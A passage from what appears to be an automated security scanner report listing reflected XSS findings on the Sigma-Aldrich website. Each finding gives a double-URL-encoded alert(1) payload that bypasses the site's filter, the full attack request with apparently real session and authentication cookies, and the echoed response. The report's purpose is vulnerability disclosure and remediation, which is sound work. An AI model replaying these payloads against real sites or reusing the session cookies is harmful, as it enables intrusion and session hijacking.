Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib91e58%2522%253balert%25281%2529%252f%252f3437fea45bd/sigma-aldrich/icon-literature HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:46 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib91e58";alert(1)//3437fea45bd/sigma-aldrich/icon-literature","E404") ;
   </script>
...[SNIP]...

1.441. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/icon-literature [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/icon-literature

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c4c6a%2522%253balert%25281%2529%252f%252fe3d60c3693b was submitted in the REST URL parameter 3. This input was echoed as c4c6a";alert(1)//e3d60c3693b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrichc4c6a%2522%253balert%25281%2529%252f%252fe3d60c3693b/icon-literature HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:48 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrichc4c6a";alert(1)//e3d60c3693b/icon-literature","E404") ;
   </script>
...[SNIP]...

1.442. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/icon-literature [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/icon-literature

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2958a%2522%253balert%25281%2529%252f%252fbebe4c7e690 was submitted in the REST URL parameter 4. This input was echoed as 2958a";alert(1)//bebe4c7e690 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/icon-literature2958a%2522%253balert%25281%2529%252f%252fbebe4c7e690 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:50 GMT
Content-Length: 28946
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/icon-literature2958a";alert(1)//bebe4c7e690","E404") ;
   </script>
...[SNIP]...

1.443. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76b10%2522%253balert%25281%2529%252f%252f56e6f5e4449 was submitted in the REST URL parameter 1. This input was echoed as 76b10";alert(1)//56e6f5e4449 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc76b10%2522%253balert%25281%2529%252f%252f56e6f5e4449/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:32 GMT
Content-Length: 28980
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc76b10";alert(1)//56e6f5e4449/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam","E404") ;
   </script>
...[SNIP]...

1.444. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36fdd%2522%253balert%25281%2529%252f%252f5b201a91d0b was submitted in the REST URL parameter 2. This input was echoed as 36fdd";alert(1)//5b201a91d0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib36fdd%2522%253balert%25281%2529%252f%252f5b201a91d0b/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:34 GMT
Content-Length: 28980
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib36fdd";alert(1)//5b201a91d0b/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam","E404") ;
   </script>
...[SNIP]...

1.445. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/homepage-slider/november-2010/jai-memoriam

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dced1%2522%253balert%25281%2529%252f%252f7cc06b185b3 was submitted in the REST URL parameter 3. This input was echoed as dced1";alert(1)//7cc06b185b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrichdced1%2522%253balert%25281%2529%252f%252f7cc06b185b3/images/homepage-slider/november-2010/jai-memoriam HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
